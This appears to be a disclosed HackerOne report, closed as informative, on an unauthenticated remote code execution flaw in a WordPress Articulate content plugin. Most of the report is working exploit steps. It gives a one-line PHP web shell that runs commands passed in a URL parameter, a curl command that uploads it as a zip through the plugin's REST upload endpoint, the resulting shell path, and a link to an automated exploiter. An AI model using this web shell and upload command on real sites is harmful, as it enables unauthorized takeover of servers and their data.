WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)

Disclosed: 2019-11-11 15:23:26 By j4tayu To nextcloud
Low
Vulnerability Details
because in the burp suite, the build request is complicated, I only use curl 1. Create file index.html and index.php Index.html : <html> Hello world </html> Index.php : <?php system($_GET[cmd]); ?> 2. Once created enter into .zip (COMPRESS) 3.  LETS UPLOAD CURL : curl site.com/index.php/wp-json/articulate/v1/upload-data -F "name={NAMAFILE}" -F "chunk={RANDOM}" -F "chunks={RANDOM}" -F "[email protected]" 4. OK HERE, THERE IS A READING UPLOAD COMPLETE which means success we try access to site.com/PATH/ <PATH = PATH AT RESULT EX: site.com/wp-content/uploads/articulate_uploads/kntl17/index.php For the autoxploiter https://pastebin.com/BEy5iDLA ## Impact Remote code execution
Actions
View on HackerOne
Report Stats
  • Report ID: 696198
  • State: Closed
  • Substate: informative
  • Upvotes: 2
Share this report